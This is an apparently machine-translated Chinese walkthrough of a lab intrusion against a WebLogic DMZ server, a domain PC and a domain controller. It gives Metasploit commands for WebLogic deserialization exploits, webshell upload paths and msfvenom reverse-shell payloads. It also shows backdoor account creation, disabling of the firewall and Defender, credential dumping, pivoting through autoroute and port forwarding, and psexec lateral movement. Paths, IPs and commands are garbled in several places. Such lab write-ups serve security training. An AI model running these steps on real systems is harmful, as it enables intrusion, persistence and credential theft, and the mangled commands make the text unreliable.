环境设定:直流
IP:10.10.10.10
OS:Windows 2012
APP:ad域
WEB (恢复快照后登录) )。
IP1:10.10.10.80
IP2:192.168.167.133
OS:Windows 2008
APP应用程序: Weblogic 10.3.6 MSSQL 2008
电脑
IP1:10.10.10.201
IP2:192.168.167.129
OS:Windows 7
攻击机
IP:192.168.167.128
OS:Windows 10
IP:192.168.167.131
OS:Kali
内联网段: 10.10.10.0/24
DMZ网段: 192.168.167.0/24
首先从WEB机器开始。 请注意,您必须手动启动服务。 c :Oraclemiddlewareuser _ projectsdomainsbase _ domain一个简单明了的热狗下面是startWeblogic批处理
WEB计算机和PC :计算机右键-管理-设置-服务-服务器、工作站和计算机浏览器全部启动。 (6118错误无法在net view中解析,因为计算机浏览器已自动关闭。 在收集域信息时临时关闭防火墙。 ) ) ) ) )
它们都定义为vmnet2,另一个更改为nat。 请记住在启动后进行ping测试,以确保网络畅通。
一. web服务器渗透1、信息收集nmap -sS -n -A 192.168.167.130
web服务器的防火墙和360是打开的,但效果很好
漏扫也是在前面的两个测试中,awvs、netsparker还是awvs更容易使用
weblogic 10.3.6.0漏洞现成,我们直接使用;
2、取web服务器找到漏洞号: CVE-2017-10271
在配置下:
search CVE-2017-10271
use exploit/multi/http/Oracle _ WebLogic _ wsat _ de serialization _ rce
setpayloadcmd/windows/powershell _ reverse _ TCP
set RHOST 192.168.167.130
卢恩
结果没有成功;
另外还尝试了CVE-2019-2725,但最终失败,通过专业工具;
网站是Weblogic的容器,WebLogic Server版本: 10.3.6.0
试着用WeblogicScan直接扫描漏洞的可能性吧。 工具地址: https://github.com/rabbit mask/WebLogic scan
命令: python3WebLogic scan.py 192.168.111.807001
控制台路径为http://192.168.111.8033607001/console/log in/loginform.JSP,可能存在CVE-2019-2725、CVE-2019-2729
工具扫描的用户名密码无法登录到后台。 从CVE-2019-2725开始。 非序列化漏洞是由wls9-async组件造成的。 默认情况下,此组件处于打开状态,检查是否存在漏洞。
访问http://192.168.167.13033607001/_ async/asyncresponseservice
使用java反序列化终极测试工具测试漏洞,
记得上传蝎马,将shell.jsp的内容复制到反序列测试工具上传;
文件上传路径: c :Oraclemiddlewareuser _ projectsdomainsbase _ domainserversadminserver tmme
上传完成后连接成功:
关于上传地址和访问地址,在补充下:
方法1 :将外壳写入控制台的images目录
Oraclemiddlewarewl server _ 10.3serverlibconsole appweb appframeworkskins WLS console im
3http://.访问:7001/console/framework/skins/WLS console/images/shell.JSP
方法写入UDDI资源管理器目录
Oraclemiddlewareuser _ projectsdomainsbase _ domainserversadminserver _ tmp _ wl internal _ internal
plorer随机字符warshell.jsp 目录写入木马,访问 http://...:7001/uddiexplorer/shell.jsp
方法3:在应用安装目录中
OracleMiddlewareuser_projectsdomainsapplicationserversAdminServertmp_WL_user项目名随机字符warshell.jsp 目录写入木马,
访问 http://...:7001/项目名/shell.jsp (1)CS登场拿下控制权
上传木马,不要上传到c盘根目录,否则会报错,其实是没有权限执行;
先提权:
信息收集:
冰蝎可以直接派生会话给msf的,不过为了后续方便,我们还是生成一个msf木马,后续也要用到;
生成木马并连接:
常规的先提权,由于在CS里已经提过一次了,CS里是以system权限运行的程序,所以这里直接就是system权限了;
执行run post/windows/manage/enable_rdp模块来打开远程桌面
net user hack 1qaz@WSX /add
net localgroup administrator hack /add
netsh advfirewall set allprofiles state off #关闭防火墙
net stop windefend
run post/windows/gather/enum_patches 补丁信息
run post/multi/recon/local_exploit_suggester 查询可利用的漏洞
域内存活主机探测(系统、端口)
搭建反向socks4代理,为下一步入侵做准备;
run get_local_subnets #查看路由段
run autoroute -s 10.10.10.0/24 #添加路由至本地
run autoroute -p #打印当前路由信息
编辑本地的代理服务:
vim /etc/proxychains.conf
用命令的方式收集域信息:
抓密码:
这里再介绍一个收集密码工具-LaZagne,每个软件都使用不同的技术(纯文本,API,自定义算法,数据库等)存储其密码,这个工具是用来获取存储在本地计算机上的密码,诸如浏览器密码等等。
知道了密码,先尝试用psexec,直接把域控服务器给打下来了。。。
尝试打一波pc,可惜失败了;
因为CS的smb的beacon不稳定,所以考虑作个代理;CS代理功能很强大,直接带的有;
对于PC,直接打了一波psexec_psh,打下来了,因为PC双网卡也是192段的,很稳定就不用在额外代理了;
用msf生成一个内网的木马,此处内网ip10段是不能直接连接192段的;将木马种在内网10段的机器上;
PC服务器内网IP;
web服务器双网卡;
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.80 LPORT=6677 -f exe > 444.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.167.131
set lport 7777
exploit
在web服务器用lcx工具执行端口转发:
在PC端运行木马,然后成功回连;
还可以用msf自带的通道,将路由添加上,其实就已经是通的了;
run get_local_subnets #查看路由段
run autoroute -s 10.10.10.0/24 #添加路由至本地
run autoroute -p #打印当前路由信息
借用的是session 3的通道,而session 3是双网卡,能通内网的;
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.80 LPORT=6677 -f exe > 444.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.10.80
set lport 6677
exploit
在这里复用exploit/multi/handler模块,进行重新设置是可以的,将端口分开使用不要重复;
运行程序后成功上线:两个会话同时存在,没有冲突;